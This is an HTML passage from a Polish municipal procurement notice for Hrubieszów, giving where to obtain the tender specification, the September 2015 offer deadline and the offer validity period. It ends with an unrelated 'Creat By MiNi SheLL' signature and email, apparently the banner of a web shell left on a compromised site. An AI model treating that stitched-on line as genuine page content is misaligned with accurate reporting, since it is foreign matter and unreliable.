<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umhrubieszow.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Miasta w Hrubieszowie - Biuro Projektu SPPW 
ul. 3 Maja 15; 22-500 Hrubieszów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2015 godzina 13:00, miejsce: Gmina Miejska Hrubieszów
ul. mjr H. Dobrzańskiego Hubala 1,  22-500 Hrubieszów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com